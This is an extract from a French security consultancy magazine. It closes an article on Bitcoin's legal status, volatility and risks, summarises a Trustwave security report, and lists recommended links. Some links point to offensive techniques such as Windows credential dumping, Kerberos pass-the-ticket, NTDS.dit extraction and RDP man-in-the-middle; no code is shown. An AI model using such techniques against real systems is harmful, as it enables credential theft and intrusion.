Chaque nouvelle valeur de hash contient des informa-
tions sur les prcdentes transactions.
+
La nouvelle valeur de hash est donc base sur la combi-
Prsentation du Bitcoin
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
59
> Cadre Juridique et donnes co-
nomiques
La situation lgale de Bitcoin est relativement complexe
et commence tout juste inquiter les tats. Ces craintes
sont dues divers facteurs : dune part son expansion plus
que rapide, ainsi que le manque dencadrement juridique
autour des monnaies numriques, et dautre part les mul-
tiples uctuations de son cours, sans omettre les drives
potentielles.
lchelle mondiale, Bitcoin nest donc pas considr
comme illgal ni mme comme lgal. Cependant, certains
pays se sont dores et dj positionns an de restreindre
ou mme de bannir cette nouvelle devise (Argentine, Viet-
nam, Islande, Chine). La Russie de son ct refuse avec fer-
met toutes les monnaies en dehors du rouble, le Bitcoin
est donc considr comme illgal. Dautres pays linstar
de la Thalande, du Mexique ou encore de lAllemagne sou-
haitent simplement limiter son impact en particulier sur les
marchs boursiers et dconseillent fortement son utilisa-
tion aux entreprises et aux banques traditionnelles .
Les tats-Unis de leur ct considrent le bitcoin comme un
bien lgal. Les plus-values effectues sont donc imposes
comme gains sur le capital. Les revenus des mineurs
sont galement assujettis limpt sur les paiements re-
us en bitcoins, tout comme dventuels salaires verss,
en calculant la valeur au moment o la transaction a t
accomplie.
lchelle mondiale,
Bitcoin nest donc pas considr
comme illgal ni mme comme lgal.
En France, la question de la lgalit na pas encore t tran-
che. Actuellement, le bitcoin nest pas considr comme
une monnaie part entire, mais nest pas non plus re-
jet. la question les bitcoins sont-ils imposables ? ,
la Direction Gnrale des Finances Publiques (DGFiP) na
prvu aucune disposition scale spcique. Cependant, les
plus-values ralises lors de la vente de bitcoins sont bien
imposables.
Si lon se renseigne auprs des instances telles que la
Banque de France (BDF) ou lAutorit de contrle pru-
dentiel et de rsolution (ACPR), on apprend que le
bitcoin est une unit de compte virtuelle stocke sur un
support lectronique permettant une communaut duti-
lisateurs dchanger entre eux des biens et des services
sans avoir recourir la monnaie lgale. Le bitcoin a t
cr pour remplir les trois fonctions traditionnelles de la
monnaie : (i) il reprsente une unit de compte, i.e. une
unit standardise qui permet de mesurer la valeur des ux
et des stocks de biens, de services ou dactifs ; (ii) il facilite
les transactions commerciales et (iii) il permet de stocker
une valeur pouvant tre utilise dans le futur.
Une prcision est cependant apporte : Pour autant, le
bitcoin ne peut pas tre quali de monnaie ayant cours
lgal dans la mesure o il est possible de le refuser en paie-
ment sans contrevenir aux dispositions de larticle R642-3
du Code pnal, qui sanctionne le refus daccepter les billets
et les pices libells en euros ayant cours lgal. Sa mise en
circulation ne violerait donc pas le monopole dmission de
la monnaie ayant cours lgal des banques centrales.
Cela signie simplement que le bitcoin nest pas une mon-
naie au sens de la loi. Cependant, il ny a rien dillgal dans
son concept, ce qui est assez paradoxal juridiquement par-
lant. On constate ainsi un foss norme entre la Loi et le
numrique. La faible documentation prsente sur le Net en
est le premier tmoin.
De tout ce ou, on retiendra du bitcoin que :
+
bien que dpourvu de tout statut lgal ou rglemen-
taire, il est accept en France par quelques commerants ou
services, utilisant ou non Internet. Ainsi que par certaines
organisations non gouvernementales ou associations (par
exemple La Quadrature du Net) ;
+
aucune garantie ou aucun mcanisme de recours lgal
de remboursement nexiste ;
+
aucune garantie nexiste quant la valeur des transac-
tions (tout tant entirement li au principe de loffre et de
la demande) ;
+
chaque opration effectue est irrversible.
titre de comparaison, la France est en retard par rapport
dautres conomies comme les tats-Unis, certains pays
dAsie (exemple avec le Japon o le bitcoin mme sil na
pas le statut de monnaie est considr comme marchan-
dise et o le premier guichet automatique bancaire ddi
sera bientt disponible), ou encore Isral. Cette situation
sexplique de plusieurs manires, en particulier sur la r-
glementation.
> INFO
Le statut des monnaies virtuelles actuellement
ltude aux tats-Unis
Les monnaies virtuelles viennent dtre places sur la liste des
technologies tudier an de dterminer si elles constituent
une potentielle menace lie au terrorisme.
Les autorits gouvernementales ont donc plac le Bitcoin, ainsi
que dautres monnaies cryptographiques, sur la liste des projets
de recherches potentiellement lis aux menaces terroristes.
Le programme est li au Combating Terrorism Technical
Support Ofce (CTTSO) / Technical Support Working Group
(TSWG), une branche du Dpartement de la Dfense des
Etats-Unis. Il a pour principal objectif de permettre aux forces
militaires dvaluer les menaces des nouvelles technologies.
Dans ce contexte, lmergence des monnaies virtuelles apparait
comme une vritable menace aux yeux des instances amri-
caines. Elles sont dailleurs catgorises en tant que dange-
reuse menace pour la nance et inuenceraient lefcacit
des attaques terroristes .
Il reste dsormais attendre les conclusions de ce rapport qui
pourraient remettre en question lutilisation des monnaies
virtuelles (mme si cela semble peu probable).
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
60
Pourquoi est-il difcile de rglementer Bitcoin ?
Cette complexit est essentiellement lie la dcentralisa-
tion du systme. Aucune banque centrale ou aucun tat ne
peut contrler les missions de cette monnaie virtuelle ni
mme ses transferts. Plusieurs tats commencent cepen-
dant sintresser aux bitcoins pour des raisons aussi bien
scales quconomiques. Nanmoins, aucune lgislation
proprement parler nexiste, mme si des discussions sont
en cours dans de nombreux gouvernements.
Tout cet argent dmatrialis au travers du bitcoin repr-
sente galement une importante perte pour lconomie
relle des pays. Selon certains analystes, il favorise aussi
lvasion scale et le blanchiment dargent. Une nouvelle
fois, les bitcoins sont lgaux de facto grce aux acteurs
qui acceptent cette monnaie, mais sortent de tout cadre
juridique.
Bien videmment, il serait assez simpliste et fortement
hypocrite de rejeter lensemble des agissements criminels
ou cybercriminels sur les monnaies numriques Il serait
prfrable de souligner les lenteurs de la justice quant aux
volutions numriques plutt que de dcrier la moindre
volution.
Tout cet argent dmatrialis
au travers du bitcoin
reprsente galement une importante perte
pour lconomie relle des pays.
Selon certains analystes,
il favorise aussi lvasion scale
et le blanchiment dargent.
Les uctuations du bitcoin
La valeur dun bitcoin est donc dtermine par la loi de
loffre et de la demande. Comme voqu en dbut de cet
article, le nombre de bitcoins est limit (21 millions duni-
ts). Leur cration quant elle rpond un rythme prvi-
sible et dcroissant, le march tant relativement restreint,
la quantit dargent requise pour affecter le cours la
hausse ou la baisse nest pas leve et rend la valeur du
bitcoin trs volatile (pour ne pas dire instable).
Les bitcoins pourraient donc potentiellement perdre toute
valeur. Mais personne nest en mesure de prdire avec cer-
titude son avenir.
Prsentation du Bitcoin
> Limites, Risques, Scurit, Actua-
lit
Nous faisons ici face une unit totalement drgule, in-
contrlable et favorisant la spculation, laissant au passage
la porte grande ouverte de nombreuses fraudes.
De nombreux points peuvent tre considrs comme des
limites lutilisation des bitcoins :
+
Le problme des bitcoins perdus. Si un utilisateur perd
son portefeuille alors tout son montant est retir de la cir-
culation. Les bitcoins perdus restent dans la chaine de
blocs , mais il nexiste aucun moyen (ofciel) de retrou-
ver les cls prives qui permettraient de les utiliser. Ils sont
ainsi considrs comme dormants . Cela permet daug-
menter la valeur du cours (moins dunits, plus de valeur).
Cela montre galement limportance des sauvegardes qui
peuvent potentiellement viter ce genre de dconvenues.
+
Des atouts bienvenus pour les cybercriminels (anony-
mat, sa valeur peut aussi tre suprieure lonce dor se-
lon les uctuations).
+
Son instabilit, son cadre lgal, la crainte dune bulle
spculative, la dation, lvasion scale, etc. Toutes les
craintes conomiques et lgales propres aux systmes mo-
ntaires de manire gnrale.
+
La prsence de diffrentes failles dans le concept mme
ainsi que dans limplmentation notamment de son proto-
cole (exemple rcent avec la perte de 4474 bitcoins sur Silk
Road, un march noir sur Internet qui a pour particularit
dutiliser le rseau Tor an de sassurer de lanonymat des
acheteurs et des vendeurs. La cause serait une due une
Transaction Malleability , plus prcisment un problme
de signature lors des transactions).
+
Diverses attaques existent :
o les DoS visant les nuds du rseau pour ralentir les
transactions ;
o les Sybil attack visant galement le rseau ;
o les attaques diriges vers les portefeuilles des utilisa-
teurs (serveurs ou machines personnelles) ;
o ainsi que diverses crypto attack visant les cls.
+
Mme si le Bitcoin est une monnaie en thorie, scuri-
se et anonyme, il est essentiel de ne pas la stocker nim-
porte o, de faon ne pas perdre ses conomies.
Rcemment, la principale bourse dchange de bitcoins Mt.
Gox sest mise en liquidation. Cette situation est due la
perte de plus de 740 000 bitcoins la suite dune attaque
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
61

informatique. Les causes exactes restent encore inconnues
et laissent la porte ouverte de nombreuses rumeurs. Un
repreneur pourrait cependant faire une offre de rachat de la
socit et des actifs lis.

> Conclusion
Bien quutilis dans de nombreux pays, lavenir du Bit-
coin est incertain. De multiples zones dombre persistent
notamment sur le plan lgal et maintes affaires juridiques
viennent gangrner son expansion. Des alternatives et
des clones voluent dj en parallle linstar du Lite-
coin (2011), Dogecoin (2013), Ripple (2013) et consorts.
Le concept de cryptomonnaie nen est donc qu ses pr-
mices, mais pourrait lavenir prsenter une alternative
crdible aux systmes actuels. Bitcoin pose ainsi les bases
techniques, juridiques, conomiques des volutions venir.
Rfrences
Informations Gnrales
+
http://blog.xmco.fr/index.php?post/2013/12/06/Le-
Bitcoin%2C-une-monnaie-virtuelle-intra%C3%A7able
+
http://www.bitcoin.fr
+
https://bitcoin.org/fr/
+
https://bitcoin.org/bitcoin.pdf
+
http://www.coindesk.com
+
http://www.ibtimes.co.uk/bitcoin-litecoin-doge-
coin-guide-crypto-currency-mining-1433245
Technique
+
https://en.bitcoin.it/wiki/Block_hashing_algorithm
+
https://en.bitcoin.it/wiki/Difculty
+
http://www.righto.com/2014/02/bitcoin-mi-
ning-hard-way-algorithms.html
Aspect Economique
+
http://bitcoincharts.com
+
https://www.bitcoin.de
+
https://coinbase.com/charts
+
http://www.europenouvelles.com/nouvelles-econo-
mie/innovations-et-obstacles-bitcoin-6/
+
http://blockchain.info/fr/charts/total-bitcoins
Aspect Juridique
+
http://www.getavocat.fr/blog/2014/02/27/le-bitcoin-
synthese-de-l-analyse-de-la-banque-de-france-et-l-auto-
rite-de-controle-prudentiel-et-de-resolution.html
+
http://www.ecb.europa.eu/pub/pdf/other/virtualcur-
rencyschemes201210en.pdf
+
http://www.ncen.gov/news_room/rp/rulings/pdf/
FIN-2014-R001.pdf
+
http://www.ncen.gov/news_room/rp/rulings/pdf/
FIN-2014-R002.pdf
+
http://www.banque-france.fr/leadmin/user_upload/
banque_de_france/publications/Focus-10-stabilite-nan-
ciere.pdf
+
http://www.coindesk.com/information/is-bitcoin-legal/
+
http://en.wikipedia.org/wiki/Legality_of_Bitcoins_by_
country
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
62
Trustwave global security report
Des chercheurs travaillant pour Trustwave ont rcupr et
tudi des donnes concernant 691 incidents de scurit
rpartis dans 24 pays.
Le premier lment qui ressort de cette analyse rvle que
les donnes bancaires restent llment le plus compromis
(45 % des attaques y sont lies), viennent ensuite les in-
formations personnelles. Un classement des dix principales
victimes dattaques a dailleurs t publi. On retrouve dans
cet ordre : les tats-Unis, qui abritent le plus de victimes (59
%), le Royaume-Uni (14 %), puis, lAustralie (11 %). Ce trio
est suivi par Hong Kong, lInde, le Canada, la Nouvelle-Z-
lande, lIrlande, la Belgique et lle Maurice.
96 % des applications analyses par Trustwave en 2013
abritaient une ou plusieurs failles critiques de scurit.
Ce premier constat dmontre la ncessit des tests de s-
curit ds la phase de dveloppement.
Concernant les malwares, Trustwave considre quils sont
prsents partout :
+
Ils restent loutil favori des attaquants pour rcuprer
des donnes. Les tats-Unis (42 %), la Russie (13 %) et lAl-
lemagne (9 %) demeurent les pays les plus actifs en terme
d hbergement ;
+
78 % des mthodes de contamination taient lies
des applets Java (donc des vulnrabilits lies Java) ;
+
85 % des exploits dtects en 2013 taient dus des
plug-ins tiers (Java, Adobe Flash et Acrobat Reader) ;
+
Les spams composs de pices jointes malveillantes (ou
liens) ne cessent de croitre.
Du ct des compromissions, trs peu dentreprises par-
viennent dtecter elles-mmes les intrusions (71 % ne
les dtectent pas).
Le whitepaper du mois
par Charles DAGOUAT
D
a
v
i
d
e

S
i
m
o
n
e
l
l
i
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
63
Enn, Trustwave recommande quelques lments de scu-
risation et bonnes pratiques :
+
protger les utilisateurs face eux-mmes (cela passe
essentiellement par la formation et la sensibilisation des
employs) ;
+
imposer des politiques didentiants forts et ventuelle-
ment des authentications multiples ;
+
protger toutes les donnes (la moindre vulnrabilit
mme minime peut conduire des exploitations plus pous-
ses) ;
+
modliser les menaces et tester (ou faire tester) ses sys-
tmes ;
+
plannier des mthodes de rponse incident.
Ce whitepaper est disponible ladresse suivante :
http://www2.trustwave.com/rs/trustwave/images/2014_
Trustwave_Global_Security_Report.pdf?aliId=18259011
Whitepapers du mois
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
64
Le meilleur du web
Aprs plusieurs annes de bons et loyaux
services, la rubrique Outils est dsormais
remplace par la Revue du Web. Cette
partie permettra de faire un tour dhorizon
des articles scurit les plus intressants !
Stphane AVI
> Slection darticles divers
> Slection darticles techniques
> Twitter
Slection de comptes Twitter
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
64
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
65
Le meilleur du web
> Slection darticles RSSI
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Rgles de dploiement de Java 7 sur un poste
de travail
ht t ps: //www. facebook . com/not es/pr ot ect-
the- graph/protecti ng-the-j ava-browser-pl u-
gin/1405538516352962
http://digital-forensics.sans.org/media/poster_2014_
http://www.scottbrownconsulting.com/2014/05/
truecrypt-what-happened-what-it-means-and-what-
http://blog.spiderlabs.com/2014/03/coldfusion-ad-
min-compromise-analysis-cve-2010-2861.html
http: //j umpespj ump. bl ogspot . fr/2014/03/at-
tacking-adobe-coldfusion.html
http://linux-audit.com/dealing-with-a-compro-
http://csrc.nist.gov/publications/drafts/800-82r2/
sp800_82_r2_draft.pdf
Poster du SANS pour rechercher des preuves
sous Windows
Guide pratique sur la recherche dinformation
sur Internet
Article intressant sur les mesures anti-foren-
sic pris aprs Snowden
Retour sur laffare TrueCrypt
Dtails dune attaque ColdFusion
Liste de vulnrabilits affectant ColdFusion
Les rexes avoir en cas de compromission
Guide du NIST sur la scurit des systmes in-
dustriels
http://forensicmethods.com/snowden-forensics
http://www.netpublic.fr/2014/03/guide-pratique-de-
la-recherche-d-informations/
65
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
66
> Slection darticles techniques
Le meilleur du web
http://blog.gentilkiwi.com/securite/mimikatz/pass-
the-ticket-kerberos
http://volatility-labs.blogspot.fr/2014/01/true-
crypt-master-key-extraction-and.html
ht t ps : // www. s ec ur us gl obal . com/ commu-
nity/2013/12/20/dumping-windows-credentials/
ttp://blog.cyberis.co.uk/2014/02/obtaining-ntdsdit-
using-in-built.html
https://github.com/hatRiot/clusterd
https://labs.portcullis.co.uk/blog/ntfs-alternate-data-
streams-for-pentesters-part-1/
http://diablohorn.wordpress.com/2014/04/21/quick-
poc-to-mitm-rdp-ssl/
http://bouk.co/blog/elasticsearch-rce/
https://github.com/Phaeilo/vol-openvpn
http://blog.sucuri.net/2014/02/php-backdoors-hid-
den-with-clever-use-of-extract-function.html
Fonctionnement des tickets Kerberos et leur
utilit
Rcupration dune clef Master dun conteneur
TrueCrypt
Cheatsheet pour lextraction de mots de passe
sous Windows
Faire un dump de la base NTDS.dit avec ntdsutil
Outils dintrusion de serveurs applicatifs
Fonctionnement des data streams NTFS sous
Windows
Attaque Man In The Middle RDP en quelques
lignes
Dtails techniques sur lexploitation de la faille
CVE-2014-3120 (Elasticsearch)
Plugin Volatility pour extraire les identiants
openVPN en mmoire
Erreurs de conguration dans sudo pour lver
ses privilges
66
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
67
> Slection des comptes Twitter suivis
par le CERT-XMCO
Ivan Novikov
Chris John Riley
Cedric Pernet
Responder
Rob Fuller
Room362.com
Chris Gates
Maximiliano Soler
corelanc0d3r
David Durvaux
https://twitter.com/d0znpp
https://twitter.com/ChrisJohnRiley
https://twitter.com/cedricpernet
https://twitter.com/Responder
https://twitter.com/mubix
https://twitter.com/room362
https://twitter.com/carnal0wnage
https://twitter.com/maxisoler
https://twitter.com/corelanc0d3r
https://twitter.com/ddurvaux
we deliver security expertise

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
68
Jaygoldman
https://www.ickr.com/photos/chesh2000/444045125
Seth Anderson
https://www.ickr.com/photos/swanksalot/13432086015
gTarded
https://www.ickr.com/photos/gtarded/2759499462
Tarang hirani
https://www.ickr.com/photos/tarang9211/7919299504/
Snoopsmaus
https://www.ickr.com/photos/snoopsmaus/13762970893/
Zach Copley
https://www.ickr.com/photos/zcopley/8753275612
Jason Benjamin
https://www.ickr.com/photos/jason_benjamin/8631889823
Davide Simonelli
https://www.ickr.com/photos/digital-noise/3726590486
Cory Doctorow
https://www.ickr.com/photos/doctorow/12789585683
> Remerciements
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet
de conseil XMCO. Sa vocation est de fournir des prsentations claires et dtailles sur le
thme de la scurit informatique, et ce, en toute indpendance. Tous les numros de
lActuScu sont tlchargeables ladresse suivante :
http://www.xmco.fr/actusecu.html
Photographie
R
o
m
a
i
n

M
A
H
I
E
U
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
69
www.xmco.fr
69 rue de Richelieu
75002 Paris - France
tl. +33 (0)1 47 34 68 61
fax. +33 (0)1 43 06 29 55
mail. info@xmco.fr
web www.xmco.fr
SAS (Socits par Actions Simplies) au capital de 38 120 - Enregistre au Registre du Commerce de Paris RCS 430 137 711
Code NAF 6202A - NSIRET : 430 137 711 00056 - N TVA intracommunautaire : FR 29 430 137 711

You might also like